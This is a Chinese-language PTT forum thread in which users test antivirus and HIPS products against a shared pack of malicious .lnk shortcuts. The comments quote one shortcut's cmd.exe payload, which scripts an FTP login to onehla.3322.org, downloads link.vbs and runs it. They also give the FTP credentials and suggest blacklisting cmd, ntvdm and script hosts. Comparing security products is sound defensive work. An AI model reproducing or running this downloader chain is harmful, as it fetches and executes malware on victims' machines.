: -- : ※ 發信站: 批踢踢實業坊(ptt.cc) : ◆ From: 59.112.10.194 : 推 pgpayton:D+ 預設情況下早已將windows重要的資料夾加入保護 01/30 13:06 : → pgpayton:未經授權的程序是不容許竄改的 防火牆沒必要關閉吧 01/30 13:10 : → pgpayton:因為Ftp.exe要往外連 會有提示 我測的結果是lnk都無效 01/30 13:11 : → pgpayton:不然請您把有效的lnk丟給我 01/30 13:12 : → miamodo:@@刺套跳蛋@@.download,更改副檔名為lnk 01/30 14:51 : → miamodo:查一下computer security plolicy內cmd.exe的規則… 01/30 14:51 : → miamodo:如果fd阻止t.t及link.vbs的創建,就不能測試了 01/30 14:51 : → miamodo:很久沒有使用defense wall了,不了解它在情形如何… 01/30 14:52 : → miamodo:以下是跳蛋其中一段 01/30 14:53 : → miamodo:%windir%\system32\cmd.exe 01/30 14:53 : → miamodo:/c echo open onehla.3322.org >t.t&echo 123>>t.t&echo 01/30 14:54 : → miamodo:get 1-1 %windir%\link.vbs>>t.t&echo bye>>t.t&ftp -s: 01/30 14:55 : → miamodo:t.t&del t.t&start %windir%\link.vbs& 01/30 14:55 : → miamodo:%windir%\system32\cmd.exe 01/30 14:56 : → miamodo:15-1645522239-1606980848-500_CLASSES 01/30 14:56 : → miamodo:Lucida Console 01/30 14:57 : → miamodo:其實也不必去run,在網址列輸入ftp:\\onehla.3322.org 01/30 14:59 : → miamodo:輸入username:123,password:123,也可下載.... 01/30 15:01 : 推 pgpayton:D+ fd預設根本沒設cmd.exe的規則 有設的話此病毒包的病毒 01/30 16:00 : → pgpayton:大部分都沒辦法執行 另外為啥要改副檔名? 我是指原本病毒 01/30 16:01 : → pgpayton:包的lnk檔 那些download檔 我點擊也都是沒任何事發生 01/30 16:03 : → pgpayton:download檔我就沒每個試 01/30 16:04 : → miamodo:computer security plolicy->AD 01/30 16:34 : → miamodo:原Po已說過download檔是lnk檔.... 01/30 16:35 : 推 pgpayton:AD沒設cmd的規則阿 另外要改副檔名才能執行病毒 那就跟 01/30 16:53 : → pgpayton:防毒軟體的隔離 差不多了 也就是使用者誤點也無法執行 01/30 16:54 : → miamodo:如果您未曾設cmd規則,在執行lnk檔時,在paranoid模式下 01/30 17:10 : → miamodo:應會出現explorer.exe excute cmd.exe的詢問視窗 01/30 17:11 : → miamodo:所以您說d+無反應,個人才會不解.... 01/30 17:12 : → miamodo:另外您說的沒錯副檔名download是不能直接在雙擊執行的.. 01/30 17:12 : 推 TypeZero:這是因為google瀏覽器會自動改副檔名... 01/30 17:23 : 推 pgpayton:explorer.exe excute cmd.exe? 我是執行lnk檔 並不是cmd 01/30 17:24 : → pgpayton:如果改成無法執行的副檔名 那也就不能怪防毒的偵測率低弱 01/30 17:25 : → miamodo:謝謝T大的說明... 01/30 17:27 : 推 pgpayton:也不是說D+無反應 因為explorer.exe是執行某檔案D+會出現 01/30 17:28 : → pgpayton:的正常提示 我應該改成D+無偵測到可疑行為 01/30 17:29 : → miamodo:謝謝p大的說明,這病毒包讓我又學到很多東西,感謝... 01/30 17:32 : → miamodo:為了安全起見建議p大將cmd,ntvdm,?script等列入黑名單.. 01/30 17:38 : 推 pgpayton:感謝你的好意 不過我電腦並沒裝comodo.. 01/30 17:41 : 推 pgpayton:另外請教T大為何有的會改成無效的副檔名? 有的不會? 01/30 18:03 防毒軟體的偵測應該跟副檔名沒有關係吧... 主要是判定該檔案具有威脅性 再說，竟然有防毒軟體可以偵測，為什麼某些防毒軟體不能 希望不要再為特定防毒軟體過度保護，這樣不能讓一個防毒廠商成長 只是助長病毒 讓病毒更加氾濫，使用者也不一定要一直用同一套防毒軟體 雖然說升級的費用較便宜，但是如果病毒造成無法挽回的後果那就糟了 比如說阿宅珍藏的釘宮理惠配音的動畫被刪光（不要在意那四個字＝ ＝） 類似這樣的事情多得不償失呀！ 所以防毒軟體要做到的是萬全的防護，而不是針對特定副檔名的防護 因為如果分成兩段式，利用一個exe檔去指令執行某個亂七八糟副檔名的檔案 這樣不就中鏢了？ 我個人認為應該是沒有這樣的問題，希望有人能幫忙測試那些效能低落的防毒軟體 將我發的病毒包*.download檔案，利用批量重新命名改成*.lnk 測試看看是否有改變，基本上應該是不會改變的 lnk連結失效，但是kis還是可以偵測，所以這應該跟失不失效沒關係 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 114.46.167.126 ※ 編輯: TypeZero 來自: 114.46.167.126 (01/30 19:33) ※ 編輯: TypeZero 來自: 114.46.167.126 (01/30 19:33)